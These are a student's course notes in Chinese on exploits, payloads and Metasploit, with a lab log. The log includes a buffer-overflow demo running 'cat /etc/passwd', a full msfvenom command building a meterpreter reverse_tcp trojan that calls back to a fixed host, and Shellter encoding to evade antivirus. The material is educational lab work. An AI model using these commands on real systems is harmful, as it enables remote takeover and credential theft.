# 網路攻防與技術應用 - 第十二周 > ## 弱點利用平台 ## 弱點利用原理 #### 利用程序中的某些漏洞(Vulnerability)，來得到計算機的控制權（使自己編寫的代碼越過具有漏洞的程序的限制，從而獲得運行權限）。 #### ==Exploit==：利用漏洞而編寫的攻擊程序，即漏洞利用程序。 #### 經常還可以看到名為ExploitMe的程序。這樣的程序是故意編寫的具有安全漏洞的程序，通常是為了練習寫Exploit程序。 > #### Exploit的基本過程是如下： > #### 1. ==對目標網站進行掃描==。可以使用已知的漏洞掃描軟件進行掃描，查看目標是否有漏洞列表中的漏洞。也可以用一些專門的軟件，掃描目標的其他相關信息，包括網站使用的操作系統版本、提供的服務以及開放的端口。 > #### 2. 對掃描獲得的信息進行==分析研究==，從而找出漏洞所在及其利用方法。 > #### 3. 選用==相應的工具==，獲得密碼檔、添加用户、獲得管理員權限等。 #### ==Payload==：Payload是實際工作的一部分。弱點利用(exploit)只是用來在目標上執行Payload 。 #### ==POC==，Proof ofConcept，中文意思是“觀點證明”。這個短語會在漏洞報告中使用，==漏洞報告中的POC則是一段說明或者一個攻擊的樣例==，使得讀者能夠確認這個漏洞是真實存在的。 ## 弱點利用程式 ### 弱點利用程式包含： * #### 利用弱點方式：exploit * #### ==弱點利用(exploit)後要做的行為==：Payload ### Exploit弱點利用程式問題：具==平台獨立性== * #### 不同的作業系統時做記憶體配置方式不太一樣，因此exploit需要特別針對不同的作業系統進行分析與撰寫弱點利用的方式。 ### Payload需要在弱點利用主機上運行，因此受到==硬體==及==作業系統==影響 ## 弱點利用平台 ### Metasploit:滲透測試工具平台 ## 實作-弱點利用程式 依老師上課講義，製作一個c程式 利用程式碼弱點(指標變數char*→4個位元組) 當輸入超過fname長度後，就會寫到lname 而且system(lname)會被執行，即Payload(cat /etc/passwd)  ## 實作-弱點利用平台 針對Windows10的攻擊 安裝win10虛擬機 https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/  建立惡意執行檔案/木馬程式 `msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows –f exe LHOST=169.254.225.8 LPORT=4444 -o /home/kali/something32.exe`  在kali中安裝sudoapt-get install shelter  安裝完成後，終端直接輸入shellter打開會報錯 根據提示我們直接執行命令 dpkg --add-architecture i386 && apt-get update && apt-get install wine32   執行shellter，輸入前一步驟產生的exe檔  但google了3、4小時還是解決不了  換用公司電腦重做一變，成功進行再一次編碼  virtubox 不知為何無法拖曳檔案，偶爾成功拖曳還會顯示檔案編碼問題拒絕複製，嘗試了網路上的方法，都失敗。 最後直接架設一個網站來分享       但沒關掉防毒的狀況下會被擋下來，且chrome本身就會偵測，必須用Edge  最後還是失敗  換個地方、換個電腦，重新操作一次→成功...